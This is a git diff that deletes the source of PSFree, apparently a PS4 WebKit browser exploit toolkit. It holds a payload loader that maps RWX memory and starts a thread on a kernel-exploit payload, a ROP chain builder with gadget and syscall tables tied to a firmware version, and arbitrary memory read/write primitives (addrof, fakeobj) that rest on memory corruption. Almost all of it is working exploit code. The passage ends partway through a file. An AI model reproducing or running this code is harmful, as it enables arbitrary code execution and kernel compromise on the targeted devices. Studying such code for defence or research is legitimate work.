-        var backing = new Uint8Array(0x10000 + sz);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = backing;
-        return ptr;
-    }
-
-    function malloc32(sz) {
-        var backing = new Uint8Array(0x10000 + sz * 4);
-        nogc.push(backing);
-        var ptr = mem.readp(mem.addrof(backing).add(0x10));
-        ptr.backing = new Uint32Array(backing.buffer);
-        return ptr;
-    }
-
-
-kexploit().then(() => {
-    
-    window.pld_size = new Int(0x26200000, 0x9);
-
-    var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
-    var payload = window.pld;
-    var bufLen = payload.length * 4
-    var payload_loader = malloc32(bufLen);
-    var loader_writer = payload_loader.backing;
-    for (var i = 0; i < payload.length; i++) {
-        loader_writer[i] = payload[i];
-    }
-    chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
-    var pthread = malloc(0x10);
-
-    call_nze(
-        'pthread_create',
-        pthread,
-        0,
-        payload_loader,
-        payload_buffer,
-    );
-
-
-    
-
-
-})
diff --git a/psfree/module/chain.mjs b/psfree/module/chain.mjs
deleted file mode 100644
index 3116482..0000000
--- a/psfree/module/chain.mjs
+++ /dev/null
@@ -1,581 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-import { Int, lohi_from_one } from './int64.mjs';
-import { get_view_vector } from './memtools.mjs';
-import { Addr } from './mem.mjs';
-import * as config from '../config.mjs';
-
-// put the sycall names that you want to use here
-export const syscall_map = new Map(Object.entries({
-    'read' : 3,
-    'write' : 4,
-    'open' : 5,
-    'close' : 6,
-    'getpid' : 20,
-    'setuid' : 23,
-    'getuid' : 24,
-    'accept' : 30,
-    'pipe' : 42,
-    'ioctl' : 54,
-    'munmap' : 73,
-    'mprotect' : 74,
-    'fcntl' : 92,
-    'socket' : 97,
-    'connect' : 98,
-    'bind' : 104,
-    'setsockopt' : 105,
-    'listen' : 106,
-    'getsockopt' : 118,
-    'fchmod' : 124,
-    'socketpair' : 135,
-    'fstat' : 189,
-    'getdirentries' : 196,
-    '__sysctl' : 202,
-    'mlock' : 203,
-    'clock_gettime' : 232,
-    'nanosleep' : 240,
-    'sched_yield' : 331,
-    'kqueue' : 362,
-    'kevent' : 363,
-    'rtprio_thread' : 466,
-    'mmap' : 477,
-    'ftruncate' : 480,
-    'shm_open' : 482,
-    'cpuset_getaffinity' : 487,
-    'cpuset_setaffinity' : 488,
-    'jitshm_create' : 533,
-    'jitshm_alias' : 534,
-    'evf_create' : 538,
-    'evf_delete' : 539,
-    'evf_set' : 544,
-    'evf_clear' : 545,
-    'set_vm_container' : 559,
-    'dmem_container' : 586,
-    'dynlib_dlsym' : 591,
-    'dynlib_get_list' : 592,
-    'dynlib_get_info' : 593,
-    'dynlib_load_prx' : 594,
-    'randomized_path' : 602,
-    'budget_get_ptype' : 610,
-    'thr_suspend_ucontext' : 632,
-    'thr_resume_ucontext' : 633,
-    'blockpool_open' : 653,
-    'blockpool_map' : 654,
-    'blockpool_unmap' : 655,
-    'blockpool_batch' : 657,
-    // syscall 661 is unimplemented so free for use. a kernel exploit will
-    // install "kexec" here
-    'aio_submit' : 661,
-    'kexec' : 661,
-    'aio_multi_delete' : 662,
-    'aio_multi_wait' : 663,
-    'aio_multi_poll' : 664,
-    'aio_multi_cancel' : 666,
-    'aio_submit_cmd' : 669,
-    'blockpool_move' : 673,
-}));
-
-const argument_pops = [
-    'pop rdi; ret',
-    'pop rsi; ret',
-    'pop rdx; ret',
-    'pop rcx; ret',
-    'pop r8; ret',
-    'pop r9; ret',
-];
-
-// implementations are expected to have these gadgets:
-// * libSceLibcInternal:
-//   * __errno - FreeBSD's function to get the location of errno
-//   * setcontext - what we call Sony's own version of _Ux86_64_setcontext
-//   * getcontext - what we call Sony's own version of _Ux86_64_getcontext
-// * anywhere:
-//   * the gadgets at argument_pops
-//   * ret
-//
-// setcontext/getcontext naming came from this project:
-// https://github.com/libunwind/libunwind
-//
-// setcontext(context *ctx):
-//     mov     rax, qword [rdi + 0x38]
-//     sub     rax, 0x10 ; 16
-//     mov     qword [rdi + 0x38], rax
-//     mov     rbx, qword [rdi + 0x20]
-//     mov     qword [rax], rbx
-//     mov     rbx, qword [rdi + 0x80]
-//     mov     qword [rax + 8], rbx
-//     mov     rax, qword [rdi]
-//     mov     rbx, qword [rdi + 8]
-//     mov     rcx, qword [rdi + 0x10]
-//     mov     rdx, qword [rdi + 0x18]
-//     mov     rsi, qword [rdi + 0x28]
-//     mov     rbp, qword [rdi + 0x30]
-//     mov     r8, qword [rdi + 0x40]
-//     mov     r9, qword [rdi + 0x48]
-//     mov     r10, qword [rdi + 0x50]
-//     mov     r11, qword [rdi + 0x58]
-//     mov     r12, qword [rdi + 0x60]
-//     mov     r13, qword [rdi + 0x68]
-//     mov     r14, qword [rdi + 0x70]
-//     mov     r15, qword [rdi + 0x78]
-//     cmp     qword [rdi + 0xb0], 0x20001
-//     jne     done
-//     cmp     qword [rdi + 0xb8], 0x10002
-//     jne     done
-//     fxrstor [rdi + 0xc0]
-// done:
-//     mov     rsp, qword [rdi + 0x38]
-//     pop     rdi
-//     ret
-//
-//  getcontext(context *ctx):
-//     mov     qword [rdi], rax
-//     mov     qword [rdi + 8], rbx
-//     mov     qword [rdi + 0x10], rcx
-//     mov     qword [rdi + 0x18], rdx
-//     mov     qword [rdi + 0x20], rdi
-//     mov     qword [rdi + 0x28], rsi
-//     mov     qword [rdi + 0x30], rbp
-//     mov     qword [rdi + 0x38], rsp
-//     add     qword [rdi + 0x38], 8
-//     mov     qword [rdi + 0x40], r8
-//     mov     qword [rdi + 0x48], r9
-//     mov     qword [rdi + 0x50], r10
-//     mov     qword [rdi + 0x58], r11
-//     mov     qword [rdi + 0x60], r12
-//     mov     qword [rdi + 0x68], r13
-//     mov     qword [rdi + 0x70], r14
-//     mov     qword [rdi + 0x78], r15
-//     mov     rsi, qword [rsp]
-//     mov     qword [rdi + 0x80], rsi
-//     fxsave  [rdi + 0xc0]
-//     mov     qword [rdi + 0xb0], 0x20001
-//     mov     qword [rdi + 0xb8], 0x10002
-//     xor     eax, eax
-//     ret
-
-// ROP chain manager base class
-//
-// Args:
-//   stack_size: the size of the stack
-//   upper_pad: the amount of extra space above stack
-export class ChainBase {
-    constructor(stack_size=0x1000, upper_pad=0x10000) {
-        this._is_dirty = false;
-        this.position = 0;
-
-        const return_value = new Uint32Array(4);
-        this._return_value = return_value;
-        this.retval_addr = get_view_vector(return_value);
-
-        const errno = new Uint32Array(1);
-        this._errno = errno;
-        this.errno_addr = get_view_vector(errno);
-
-        const full_stack_size = upper_pad + stack_size;
-        const stack_buffer = new ArrayBuffer(full_stack_size);
-        const stack = new DataView(stack_buffer, upper_pad);
-        this.stack = stack;
-        this.stack_addr = get_view_vector(stack);
-        this.stack_size = stack_size;
-        this.full_stack_size = full_stack_size;
-    }
-
-    // use this if you want to write a new ROP chain but don't want to allocate
-    // a new instance
-    empty() {
-        this.position = 0;
-    }
-
-    // flag indicating whether .run() was ever called with this chain
-    get is_dirty() {
-        return this._is_dirty;
-    }
-
-    clean() {
-        this._is_dirty = false;
-    }
-
-    dirty() {
-        this._is_dirty = true;
-    }
-
-    check_allow_run() {
-        if (this.position === 0) {
-            throw Error('chain is empty');
-        }
-        if (this.is_dirty) {
-            throw Error('chain already ran, clean it first');
-        }
-    }
-
-    reset() {
-        this.empty();
-        this.clean();
-    }
-
-    get retval_int() {
-        return this._return_value[0] | 0;
-    }
-
-    get retval() {
-        return new Int(this._return_value[0], this._return_value[1]);
-    }
-
-    // return value as a pointer
-    get retval_ptr() {
-        return new Addr(this._return_value[0], this._return_value[1]);
-    }
-
-    set retval(value) {
-        const values = lohi_from_one(value);
-        const retval = this._return_value;
-        retval[0] = values[0];
-        retval[1] = values[1];
-    }
-
-    get retval_all() {
-        const retval = this._return_value;
-        return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
-    }
-
-    set retval_all(values) {
-        const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
-        const retval = this._return_value;
-        retval[0] = a[0];
-        retval[1] = a[1];
-        retval[2] = b[0];
-        retval[3] = b[1];
-    }
-
-    get errno() {
-        return this._errno[0];
-    }
-
-    set errno(value) {
-        this._errno[0] = value;
-    }
-
-    push_value(value) {
-        const position = this.position;
-        if (position >= this.stack_size) {
-            throw Error(`no more space on the stack, pushed value: ${value}`);
-        }
-
-        const values = lohi_from_one(value);
-        const stack = this.stack;
-        stack.setUint32(position, values[0], true);
-        stack.setUint32(position + 4, values[1], true);
-
-        this.position += 8;
-    }
-
-    get_gadget(insn_str) {
-        const addr = this.gadgets.get(insn_str);
-        if (addr === undefined) {
-            throw Error(`gadget not found: ${insn_str}`);
-        }
-
-        return addr;
-    }
-
-    push_gadget(insn_str) {
-        this.push_value(this.get_gadget(insn_str));
-    }
-
-    push_call(func_addr, ...args) {
-        if (args.length > 6) {
-            throw TypeError(
-                'push_call() does not support functions that have more than 6'
-                + ' arguments');
-        }
-
-        for (let i = 0; i < args.length; i++) {
-            this.push_gadget(argument_pops[i]);
-            this.push_value(args[i]);
-        }
-
-        // The address of our buffer seems to be always aligned to 8 bytes.
-        // SysV calling convention requires the stack is aligned to 16 bytes on
-        // function entry, so push an additional 8 bytes to pad the stack. We
-        // pushed a "ret" gadget for a noop.
-        if ((this.position & (0x10 - 1)) !== 0) {
-            this.push_gadget('ret');
-        }
-
-        if (typeof func_addr === 'string') {
-            this.push_gadget(func_addr);
-        } else {
-            this.push_value(func_addr);
-        }
-    }
-
-    push_syscall(syscall_name, ...args) {
-        if (typeof syscall_name !== 'string') {
-            throw TypeError(`syscall_name not a string: ${syscall_name}`);
-        }
-
-        const sysno = syscall_map.get(syscall_name);
-        if (sysno === undefined) {
-            throw Error(`syscall_name not found: ${syscall_name}`);
-        }
-
-        const syscall_addr = this.syscall_array[sysno];
-        if (syscall_addr === undefined) {
-            throw Error(`syscall number not in syscall_array: ${sysno}`);
-        }
-
-        this.push_call(syscall_addr, ...args);
-    }
-
-    // Sets needed class properties
-    //
-    // Args:
-    //   gadgets:
-    //     A Map-like object mapping instruction strings (e.g. "pop rax; ret")
-    //     to their addresses in memory.
-    //   syscall_array:
-    //     An array whose indices correspond to syscall numbers. Maps syscall
-    //     numbers to their addresses in memory. Defaults to an empty Array.
-    static init_class(gadgets, syscall_array=[]) {
-        this.prototype.gadgets = gadgets;
-        this.prototype.syscall_array = syscall_array;
-    }
-
-    // START: implementation-dependent parts
-    //
-    // the user doesn't need to implement all of these. just the ones they need
-
-    // Firmware specific method to launch a ROP chain
-    //
-    // Proper implementations will check if .position is nonzero before
-    // running. Implementations can optionally check .is_dirty to enforce
-    // single-run gadget sequences
-    run() {
-        throw Error('not implemented');
-    }
-
-    // anything you need to do before the ROP chain jumps back to JavaScript
-    push_end() {
-        throw Error('not implemented');
-    }
-
-    push_get_errno() {
-        throw Error('not implemented');
-    }
-
-    push_clear_errno() {
-        throw Error('not implemented'); 
-    }
-
-    // get the rax register
-    push_get_retval() {
-        throw Error('not implemented');
-    }
-
-    // get the rax and rdx registers
-    push_get_retval_all() {
-        throw Error('not implemented');
-    }
-
-    // END: implementation-dependent parts
-
-    // note that later firmwares (starting around > 5.00?), the browser doesn't
-    // have a JIT compiler. we programmed in a way that tries to make the
-    // resulting bytecode be optimal
-    //
-    // we intentionally have an incomplete set (there's no function to get a
-    // full 128-bit result). we only implemented what we think are the common
-    // cases. the user will have to implement those other functions if they
-    // need it
-
-    do_call(...args) {
-        if (this.position) {
-            throw Error('chain not empty');
-        }
-        try {
-            this.push_call(...args);
-            this.push_get_retval();
-            this.push_get_errno();
-            this.push_end();
-            this.run();
-        } finally {
-            this.reset();
-        }
-    }
-
-    call_void(...args) {
-        this.do_call(...args);
-    }
-
-    call_int(...args) {
-        this.do_call(...args);
-        // x | 0 will always be a signed integer
-        return this._return_value[0] | 0;
-    }
-
-    call(...args) {
-        this.do_call(...args);
-        const retval = this._return_value;
-        return new Int(retval[0], retval[1]);
-    }
-
-    do_syscall(...args) {
-        if (this.position) {
-            throw Error('chain not empty');
-        }
-        try {
-            this.push_syscall(...args);
-            this.push_get_retval();
-            this.push_get_errno();
-            this.push_end();
-            this.run();
-        } finally {
-            this.reset();
-        }
-    }
-
-    syscall_void(...args) {
-        this.do_syscall(...args);
-    }
-
-    syscall_int(...args) {
-        this.do_syscall(...args);
-        // x | 0 will always be a signed integer
-        return this._return_value[0] | 0;
-    }
-
-    syscall(...args) {
-        this.do_syscall(...args);
-        const retval = this._return_value;
-        return new Int(retval[0], retval[1]);
-    }
-
-    syscall_ptr(...args) {
-        this.do_syscall(...args);
-        const retval = this._return_value;
-        return new Addr(retval[0], retval[1]);
-    }
-
-    // syscall variants that throw an error on errno
-
-    do_syscall_clear_errno(...args) {
-        if (this.position) {
-            throw Error('chain not empty');
-        }
-        try {
-            this.push_clear_errno();
-            this.push_syscall(...args);
-            this.push_get_retval();
-            this.push_get_errno();
-            this.push_end();
-            this.run();
-        } finally {
-            this.reset();
-        }
-    }
-
-    sysi(...args) {
-        const errno = this._errno;
-        this.do_syscall_clear_errno(...args);
-
-        const err = errno[0];
-        if (err !== 0) {
-            throw Error(`syscall(${args[0]}) errno: ${err}`);
-        }
-
-        // x | 0 will always be a signed integer
-        return this._return_value[0] | 0;
-    }
-
-    sys(...args) {
-        const errno = this._errno;
-        this.do_syscall_clear_errno(...args);
-
-        const err = errno[0];
-        if (err !== 0) {
-            throw Error(`syscall(${args[0]}) errno: ${err}`);
-        }
-
-        const retval = this._return_value;
-        return new Int(retval[0], retval[1]);
-    }
-
-    sysp(...args) {
-        const errno = this._errno;
-        this.do_syscall_clear_errno(...args);
-
-        const err = errno[0];
-        if (err !== 0) {
-            throw Error(`syscall(${args[0]}) errno: ${err}`);
-        }
-
-        const retval = this._return_value;
-        return new Addr(retval[0], retval[1]);
-    }
-
-}
-
-export function get_gadget(map, insn_str) {
-    const addr = map.get(insn_str);
-    if (addr === undefined) {
-        throw Error(`gadget not found: ${insn_str}`);
-    }
-
-    return addr;
-}
-
-function load_fw_specific(version) {
-    if (version & 0x10000) {
-        throw RangeError('ps5 not supported yet');
-    }
-
-    const value = version & 0xffff;
-    // we don't want to bother with very old firmwares that don't support
-    // ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
-    // which can be annoying to deal with
-    if (value < 0x700) {
-        throw RangeError("PS4 firmwares < 7.00 isn't supported");
-    }
-
-    if (0x800 <= value && value <= 0x900) {
-        return import('../rop/900.mjs');
-    }
-
-    throw RangeError('firmware not supported');
-}
-
-export let gadgets = null;
-export let libwebkit_base = null;
-export let libkernel_base = null;
-export let libc_base = null;
-export let init_gadget_map = null;
-export let Chain = null;
-
-export async function init() {
-    const module = await load_fw_specific(config.target);
-    Chain = module.Chain;
-    module.init(Chain);
-    ({
-        gadgets,
-        libwebkit_base,
-        libkernel_base,
-        libc_base,
-        init_gadget_map,
-    } = module);
-}
diff --git a/psfree/module/constants.mjs b/psfree/module/constants.mjs
deleted file mode 100644
index 268f079..0000000
--- a/psfree/module/constants.mjs
+++ /dev/null
@@ -1,20 +0,0 @@
-/* Copyright (C) 2023 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-export const KB = 1024;
-export const MB = KB * KB;
-export const GB = KB * KB * KB;
diff --git a/psfree/module/int64.mjs b/psfree/module/int64.mjs
deleted file mode 100644
index 248872e..0000000
--- a/psfree/module/int64.mjs
+++ /dev/null
@@ -1,133 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-// cache some constants
-const isInteger = Number.isInteger;
-
-function check_not_in_range(x) {
-    return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
-}
-
-// use this if you want to support objects convertible to Int but only need
-// their low/high bits. creating a Int is slower compared to just using this
-// function
-export function lohi_from_one(low) {
-    if (low instanceof Int) {
-        return low._u32.slice();
-    }
-
-    if (check_not_in_range(low)) {
-        throw TypeError(`low not a 32-bit integer: ${low}`);
-    }
-
-    return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
-}
-
-// immutable 64-bit integer
-export class Int {
-    constructor(low, high) {
-        if (high === undefined) {
-            this._u32 = new Uint32Array(lohi_from_one(low));
-            return;
-        }
-
-        if (check_not_in_range(low)) {
-            throw TypeError(`low not a 32-bit integer: ${low}`);
-        }
-
-        if (check_not_in_range(high)) {
-            throw TypeError(`high not a 32-bit integer: ${high}`);
-        }
-
-        this._u32 = new Uint32Array([low, high]);
-    }
-
-    get lo() {
-        return this._u32[0];
-    }
-
-    get hi() {
-        return this._u32[1];
-    }
-
-    // return low/high as signed integers
-
-    get bot() {
-        return this._u32[0] | 0;
-    }
-
-    get top() {
-        return this._u32[1] | 0;
-    }
-
-    neg() {
-        const u32 = this._u32;
-        const low = (~u32[0] >>> 0) + 1;
-        return new this.constructor(
-            low >>> 0,
-            ((~u32[1] >>> 0) + (low > 0xffffffff)) >>> 0,
-        );
-    }
-
-    eq(b) {
-        const values = lohi_from_one(b);
-        const u32 = this._u32;
-        return (
-            u32[0] === values[0]
-            && u32[1] === values[1]
-        );
-    }
-
-    ne(b) {
-        return !this.eq(b);
-    }
-
-    add(b) {
-        const values = lohi_from_one(b);
-        const u32 = this._u32;
-        const low = u32[0] + values[0];
-        return new this.constructor(
-            low >>> 0,
-            (u32[1] + values[1] + (low > 0xffffffff)) >>> 0,
-        );
-    }
-
-    sub(b) {
-        const values = lohi_from_one(b);
-        const u32 = this._u32;
-        const low = u32[0] + (~values[0] >>> 0) + 1;
-        return new this.constructor(
-            low >>> 0,
-            (u32[1] + (~values[1] >>> 0) + (low > 0xffffffff)) >>> 0,
-        );
-    }
-
-    toString(is_pretty=false) {
-        if (!is_pretty) {
-            const low = this.lo.toString(16).padStart(8, '0');
-            const high = this.hi.toString(16).padStart(8, '0');
-            return '0x' + high + low;
-        }
-        let high = this.hi.toString(16).padStart(8, '0');
-        high = high.substring(0, 4) + '_' + high.substring(4);
-
-        let low = this.lo.toString(16).padStart(8, '0');
-        low = low.substring(0, 4) + '_' + low.substring(4);
-
-        return '0x' + high + '_' + low;
-    }
-}
diff --git a/psfree/module/mem.mjs b/psfree/module/mem.mjs
deleted file mode 100644
index 2620230..0000000
--- a/psfree/module/mem.mjs
+++ /dev/null
@@ -1,430 +0,0 @@
-/* Copyright (C) 2023-2025 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see .  */
-
-import { Int, lohi_from_one } from './int64.mjs';
-import { view_m_vector, view_m_length } from './offset.mjs';
-
-export let mem = null;
-
-// cache some constants
-const off_vector = view_m_vector / 4;
-const off_vector2 = (view_m_vector + 4) / 4;
-const isInteger = Number.isInteger;
-
-function init_module(memory) {
-    mem = memory;
-}
-
-function add_and_set_addr(mem, offset, base_lo, base_hi) {
-    const values = lohi_from_one(offset);
-    const main = mem._main;
-
-    const low = base_lo + values[0];
-
-    // no need to use ">>> 0" to convert to unsigned here
-    main[off_vector] = low;
-    main[off_vector2] = base_hi + values[1] + (low > 0xffffffff);
-}
-
-export class Addr extends Int {
-    read8(offset) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        return m.read8_at(offset);
-    }
-
-    read16(offset) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        return m.read16_at(offset);
-    }
-
-    read32(offset) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        return m.read32_at(offset);
-    }
-
-    read64(offset) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        return m.read64_at(offset);
-    }
-
-    readp(offset) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        return m.readp_at(offset);
-    }
-
-    write8(offset, value) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        m.write8_at(offset, value);
-    }
-
-    write16(offset, value) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        m.write16_at(offset, value);
-    }
-
-    write32(offset, value) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        m.write32_at(offset, value);
-    }
-
-    write64(offset, value) {
-        const m = mem;
-        if (isInteger(offset) && 0 <= offset && offset <= 0xffffffff) {
-            m._set_addr_direct(this);
-        } else {
-            add_and_set_addr(m, offset, this.lo, this.hi);
-            offset = 0;
-        }
-
-        m.write64_at(offset, value);
-    }
-}
-
-// expected:
-// * main - Uint32Array whose m_vector points to worker
-// * worker - DataView
-//
-// addrof()/fakeobj() expectations:
-// * obj - has a "addr" property and a 0 index.
-// * addr_addr - Int, the address of the slot of obj.addr
-// * fake_addr - Int, the address of the slot of obj[0]
-//
-// a valid example for "obj" is "{addr: null, 0: 0}". note that this example
-// has [0] be 0 so that the butterfly's indexing type is ArrayWithInt32. this
-// prevents the garbage collector from incorrectly treating the slot's value as
-// a JSObject and then crash
-//
-// the relative read/write methods expect the offset to be a unsigned 32-bit
-// integer
-export class Memory {
-    constructor(main, worker, obj, addr_addr, fake_addr)  {
-        this._main = main;
-        this._worker = worker;
-        this._obj = obj;
-        this._addr_low = addr_addr.lo;
-        this._addr_high = addr_addr.hi;
-        this._fake_low = fake_addr.lo;
-        this._fake_high = fake_addr.hi;
-
-        main[view_m_length / 4] = 0xffffffff;
-
-        init_module(this);
-
-        const off_mvec = view_m_vector;
-        // use this to create WastefulTypedArrays to avoid a GC crash
-        const buf = new ArrayBuffer(0);
-
-        const src = new Uint8Array(buf);
-        const sset = new Uint32Array(buf);
-        const sset_p = this.addrof(sset);
-        sset_p.write64(off_mvec, this.addrof(src).add(off_mvec));
-        sset_p.write32(view_m_length, 3);
-        this._cpysrc = src;
-        this._src_setter = sset;
-
-        const dst = new Uint8Array(buf);
-        const dset = new Uint32Array(buf);
-        const dset_p = this.addrof(dset);
-        dset_p.write64(off_mvec, this.addrof(dst).add(off_mvec));
-        dset_p.write32(view_m_length, 3);
-        dset[2] = 0xffffffff;
-        this._cpydst = dst;
-        this._dst_setter = dset;
-    }
-
-    // dst and src may overlap
-    cpy(dst, src, len) {
-        if (!(isInteger(len) && 0 <= len && len <= 0xffffffff)) {
-            throw TypeError('len not a unsigned 32-bit integer');
-        }
-
-        const dvals = lohi_from_one(dst);
-        const svals = lohi_from_one(src);
-        const dset = this._dst_setter;
-        const sset = this._src_setter;
-
-        dset[0] = dvals[0];
-        dset[1] = dvals[1];
-        sset[0] = svals[0];
-        sset[1] = svals[1];
-        sset[2] = len;
-
-        this._cpydst.set(this._cpysrc);
-    }
-
-    // allocate Garbage Collector managed memory. returns [address_of_memory,
-    // backer]. backer is the JSCell that is keeping the returned memory alive,
-    // you can drop it once you have another GC object reference the address.
-    // the backer is an implementation detail. don't use it to mutate the
-    // memory
-    gc_alloc(size) {
-        if (!isInteger(size)) {
-            throw TypeError('size not a integer');
-        }
-        if (size < 0) {
-            throw RangeError('size is negative');
-        }
-
-        const fastLimit = 1000;
-        size = (size + 7 & ~7) >> 3;
-        if (size > fastLimit) {
-            throw RangeError('size is too large');
-        }
-
-        const backer = new Float64Array(size);
-        return [mem.addrof(backer).readp(view_m_vector), backer];
-    }
-
-    fakeobj(addr) {
-        const values = lohi_from_one(addr);
-        const worker = this._worker;
-        const main = this._main;
-
-        main[off_vector] = this._fake_low;
-        main[off_vector2] = this._fake_high;
-        worker.setUint32(0, values[0], true);
-        worker.setUint32(4, values[1], true);
-        return this._obj[0];
-    }
-
-    addrof(object) {
-        // typeof considers null as a object. blacklist it as it isn't a
-        // JSObject
-        if (object === null
-            || (typeof object !== 'object' && typeof object !== 'function')
-        ) {
-            throw TypeError('argument not a JS object');
-        }
-
-        const obj = this._obj;
-        const worker = this._worker;
-        const main = this._main;
-
-        obj.addr = object;
-
-        main[off_vector] = this._addr_low;
-        main[off_vector2] = this._addr_high;
-
-        const res = new Addr(
-            worker.getUint32(0, true),
-            worker.getUint32(4, true),
-        );
-        obj.addr = null;
-
-        return res;
-    }
-
-    // expects addr to be a Int
-    _set_addr_direct(addr) {
-        const main = this._main;
-        main[off_vector] = addr.lo;
-        main[off_vector2] = addr.hi;
-    }
-
-    set_addr(addr) {
-        const values = lohi_from_one(addr);
-        const main = this._main;
-        main[off_vector] = values[0];
-        main[off_vector2] = values[1];
-    }
-
-    get_addr() {
-        const main = this._main;
-        return new Addr(main[off_vector], main[off_vector2]);
-    }
-
-    read8(addr) {
-        this.set_addr(addr);
-        return this._worker.getUint8(0);
-    }
-
-    read16(addr) {
-        this.set_addr(addr);
-        return this._worker.getUint16(0, true);
-    }
-
-    read32(addr) {
-        this.set_addr(addr);
-        return this._worker.getUint32(0, true);
-    }
-
-    read64(addr) {
-        this.set_addr(addr);
-        const worker = this._worker;
-        return new Int(worker.getUint32(0, true), worker.getUint32(4, true));
-    }
-
-    // returns a pointer instead of an Int
-    readp(addr) {
-        this.set_addr(addr);
-        const worker = this._worker;
-        return new Addr(worker.getUint32(0, true), worker.getUint32(4, true));
-    }
-
-    read8_at(offset) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        return this._worker.getUint8(offset);
-    }
-
-    read16_at(offset) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        return this._worker.getUint16(offset, true);
-    }
-
-    read32_at(offset) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        return this._worker.getUint32(offset, true);
-    }
-
-    read64_at(offset) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        const worker = this._worker;
-        return new Int(
-            worker.getUint32(offset, true),
-            worker.getUint32(offset + 4, true),
-        );
-    }
-
-    readp_at(offset) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        const worker = this._worker;
-        return new Addr(
-            worker.getUint32(offset, true),
-            worker.getUint32(offset + 4, true),
-        );
-    }
-
-    write8(addr, value) {
-        this.set_addr(addr);
-        this._worker.setUint8(0, value);
-    }
-
-    write16(addr, value) {
-        this.set_addr(addr);
-        this._worker.setUint16(0, value, true);
-    }
-
-    write32(addr, value) {
-        this.set_addr(addr);
-        this._worker.setUint32(0, value, true);
-    }
-
-    write64(addr, value) {
-        const values = lohi_from_one(value);
-        this.set_addr(addr);
-        const worker = this._worker;
-        worker.setUint32(0, values[0], true);
-        worker.setUint32(4, values[1], true);
-    }
-
-    write8_at(offset, value) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        this._worker.setUint8(offset, value);
-    }
-
-    write16_at(offset, value) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        this._worker.setUint16(offset, value, true);
-    }
-
-    write32_at(offset, value) {
-        if (!isInteger(offset)) {
-            throw TypeError('offset not a integer');
-        }
-        this._worker.setUint32(offset, value, true);
-    }
-
